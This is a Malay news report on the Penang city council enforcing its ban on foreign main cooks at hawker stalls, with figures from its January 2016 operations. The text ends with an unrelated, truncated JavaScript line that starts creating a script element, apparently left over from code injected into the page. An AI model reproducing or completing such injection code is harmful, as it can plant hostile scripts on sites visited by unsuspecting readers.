Polisi larangan guna tukang masak warga asing, berkuatkuasa

GEORGE TOWN – Jangan ambil mudah! Itu ingatan yang diberikan Ahli Majlis bagi Majlis Bandaraya Pulau Pinang (MBPP), Ong Ah Teong kepada para peniaga dan penjaja yang melantik dan menggajikan tukang masak warga asing di sini.

Larangan tersebut adalah ekoran daripada polisi larangan menggunakan tukang masak kalangan warga asing (sebagai tukang masak utama) yang dikuatkuasakan sepenuhnya pada tahun ini, iaitu selepas kempen penerangan dan tempoh peralihan dilaksanakan pada tahun lalu (2015).

Terbaru, baru-baru ini dalam satu operasi penguatkuasaan yang dijalankan di sekitar kawasan Jelutong, MBPP telah berjaya mengenalpasti dua tukang masak warga asing iaitu masing-masing warga India dan Indonesia di Tapak Penjaja Sementara (TPS) berhadapan Caltex Jelutong.

Ah Teong berkata, pihaknya kini giat menjejaki dan memantau peniaga dan penjaja yang disyaki terlibat dengan penyalahgunaan lesen daripada Majlis.

“Pada tahun ini (2016), kita telah mula melakukan operasi penguatkuasaan sejak 6 Januari lalu. Sehingga 14 Januari lalu, lapan operasi telah dijalankan dan sebanyak 20 kes berjaya dikesan dan diberikan notis tunjuk sebab,’’ ujarnya sambil menyatakan bahawa tiada lagi amaran atau penerangan dilakukan kerana langkah tersebut telah tamat dijalankan tahun lalu.

Hadir sama, Ahli-ahli Majlis MBPP, Syerleena Abd. Rashid dan Grace Teoh Koon Gee.

Pada 2014, Kerajaan Negeri telah memperkenalkan polisi larangan menggunakan pekerja warga asing sebagai tukang masak utama di geraigerai makanan dengan tujuan untuk melindungi warisan masakan tempatan.

Ah Teong yang juga Pengerusi Jawatankuasa Tetap Kesihatan Awam MBPP memberitahu, pihaknya tidak akan teragak-agak membatalkan lesen peniaga di kompleks makanan, TPS dan PSS (Pusat Statik Sementara) milik Majlis sekiranya seseorang peniaga didapati bersalah.

“Nama-nama peniaga terlibat akan diberikan kepada pihak jawatankuasa untuk pembatalan lesen selepas Majlis (MBPP) meneliti notis tunjuk sebab yang dikemukakan,” jelas beliau.

var d=document;var s=d.createElement(‘script’);